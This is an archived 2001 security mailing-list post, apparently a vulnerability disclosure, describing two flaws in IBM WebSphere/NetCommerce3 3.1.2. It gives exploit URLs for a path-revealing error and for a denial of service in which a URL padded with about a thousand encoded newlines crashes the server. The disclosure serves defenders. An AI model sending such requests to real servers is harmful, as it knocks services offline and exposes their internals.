[LoWNOISE] IBM Websphere/NetCommerce3 DoS and one more.

From: ET LoWNOISE (etat_private)
Date: Thu Apr 12 2001 - 21:28:48 PDT

Next message: John Weidley: "FTPD Globbing vulnerability in Solaris 8"

Previous message: Sylvain Robitaille: "Re: ntp-4.0.99k23 had been updated"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

PRODUCT:  IBM Websphere/NetCommerce3
vERSION:  3.1.2 , posibly others (Unix, and NT)

+PATH REVEALING PROBLEM
Exploit:

http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK

Result:

DTWP029E: Net.Data is unable to locate the HTML block NOEXISTINGHTMLBLOCK
 in file /usr/NetCommerce3/macros/en_US/macro.d2w

+DoS with Long URL
Exploit:

http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a..(aprox 1000)..%0a

On UNIX and NT Netcommerce will crash:
  Server Not Responding

[-----------------------------------------------------------------------]

Efrain 'ET' Torres
etat_private
[LoWNOISE] Colombia 2001

Next message: John Weidley: "FTPD Globbing vulnerability in Solaris 8"
Previous message: Sylvain Robitaille: "Re: ntp-4.0.99k23 had been updated"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Apr 12 2001 - 23:55:57 PDT